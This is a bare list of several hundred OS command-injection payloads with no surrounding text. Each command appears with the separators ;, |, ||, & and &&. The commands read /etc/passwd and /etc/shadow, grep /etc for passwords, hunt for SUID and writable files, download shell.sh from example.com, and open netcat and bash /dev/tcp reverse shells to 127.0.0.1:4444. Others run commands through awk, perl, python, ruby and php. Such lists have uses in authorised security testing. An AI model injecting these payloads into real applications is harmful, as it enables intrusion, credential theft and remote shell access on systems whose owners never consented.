; ls -la
; id
; pwd
; whoami
; uname -a
; cat /etc/passwd
; cat /etc/shadow
; cat /etc/hosts
; cat /etc/issue
; cat /proc/version
; ifconfig
; ip addr
; netstat -an
; netstat -tunlp
; ps aux
; ps -ef
; env
; printenv
; echo $PATH
; echo $USER
; echo $HOME
| ls -la
| id
| pwd
| whoami
| uname -a
| cat /etc/passwd
| cat /etc/shadow
| cat /etc/hosts
| cat /etc/issue
| cat /proc/version
| ifconfig
| ip addr
| netstat -an
| netstat -tunlp
| ps aux
| ps -ef
| env
| printenv
| echo $PATH
| echo $USER
| echo $HOME
|| ls -la
|| id
|| pwd
|| whoami
|| uname -a
|| cat /etc/passwd
|| cat /etc/shadow
|| cat /etc/hosts
|| cat /etc/issue
|| cat /proc/version
|| ifconfig
|| ip addr
|| netstat -an
|| netstat -tunlp
|| ps aux
|| ps -ef
|| env
|| printenv
|| echo $PATH
|| echo $USER
|| echo $HOME
& ls -la
& id
& pwd
& whoami
& uname -a
& cat /etc/passwd
& cat /etc/shadow
& cat /etc/hosts
& cat /etc/issue
& cat /proc/version
& ifconfig
& ip addr
& netstat -an
& netstat -tunlp
& ps aux
& ps -ef
& env
& printenv
& echo $PATH
& echo $USER
& echo $HOME
&& ls -la
&& id
&& pwd
&& whoami
&& uname -a
&& cat /etc/passwd
&& cat /etc/shadow
&& cat /etc/hosts
&& cat /etc/issue
&& cat /proc/version
&& ifconfig
&& ip addr
&& netstat -an
&& netstat -tunlp
&& ps aux
&& ps -ef
&& env
&& printenv
&& echo $PATH
&& echo $USER
&& echo $HOME
; wget http://example.com/shell.sh
; curl http://example.com/shell.sh
; fetch http://example.com/shell.sh
| wget http://example.com/shell.sh
| curl http://example.com/shell.sh
| fetch http://example.com/shell.sh
|| wget http://example.com/shell.sh
|| curl http://example.com/shell.sh
|| fetch http://example.com/shell.sh
& wget http://example.com/shell.sh
& curl http://example.com/shell.sh
& fetch http://example.com/shell.sh
&& wget http://example.com/shell.sh
&& curl http://example.com/shell.sh
&& fetch http://example.com/shell.sh
; nc -e /bin/sh 127.0.0.1 4444
; nc -c /bin/sh 127.0.0.1 4444
; ncat -e /bin/sh 127.0.0.1 4444
| nc -e /bin/sh 127.0.0.1 4444
| nc -c /bin/sh 127.0.0.1 4444
| ncat -e /bin/sh 127.0.0.1 4444
|| nc -e /bin/sh 127.0.0.1 4444
|| nc -c /bin/sh 127.0.0.1 4444
|| ncat -e /bin/sh 127.0.0.1 4444
& nc -e /bin/sh 127.0.0.1 4444
& nc -c /bin/sh 127.0.0.1 4444
& ncat -e /bin/sh 127.0.0.1 4444
&& nc -e /bin/sh 127.0.0.1 4444
&& nc -c /bin/sh 127.0.0.1 4444
&& ncat -e /bin/sh 127.0.0.1 4444
; bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
; sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
| bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
| sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
|| bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
|| sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
& bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
& sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
&& bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
&& sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
; find / -name "*.conf"
; find / -type f -perm -4000
; find / -writable -type f
| find / -name "*.conf"
| find / -type f -perm -4000
| find / -writable -type f
|| find / -name "*.conf"
|| find / -type f -perm -4000
|| find / -writable -type f
& find / -name "*.conf"
& find / -type f -perm -4000
& find / -writable -type f
&& find / -name "*.conf"
&& find / -type f -perm -4000
&& find / -writable -type f
; grep -r "password" /etc/
; grep -r "root" /etc/
; grep -r "admin" /etc/
| grep -r "password" /etc/
| grep -r "root" /etc/
| grep -r "admin" /etc/
|| grep -r "password" /etc/
|| grep -r "root" /etc/
|| grep -r "admin" /etc/
& grep -r "password" /etc/
& grep -r "root" /etc/
& grep -r "admin" /etc/
&& grep -r "password" /etc/
&& grep -r "root" /etc/
&& grep -r "admin" /etc/
; df -h
; mount
; lsblk
; fdisk -l
| df -h
| mount
| lsblk
| fdisk -l
|| df -h
|| mount
|| lsblk
|| fdisk -l
& df -h
& mount
& lsblk
& fdisk -l
&& df -h
&& mount
&& lsblk
&& fdisk -l
; awk 'BEGIN {system("id")}'
; perl -e 'system("id")'
; python -c 'import os;os.system("id")'
; ruby -e 'system("id")'
; php -r 'system("id");'
| awk 'BEGIN {system("id")}'
| perl -e 'system("id")'
| python -c 'import os;os.system("id")'
| ruby -e 'system("id")'
| php -r 'system("id");'
|| awk 'BEGIN {system("id")}'
|| perl -e 'system("id")'
|| python -c 'import os;os.system("id")'
|| ruby -e 'system("id")'
|| php -r 'system("id");'
& awk 'BEGIN {system("id")}'
& perl -e 'system("id")'
& python -c 'import os;os.system("id")'
& ruby -e 'system("id")'
& php -r 'system("id");'
&& awk 'BEGIN {system("id")}'
&& perl -e 'system("id")'
&& python -c 'import os;os.system("id")'
&& ruby -e 'system("id")'
&& php -r 'system("id");'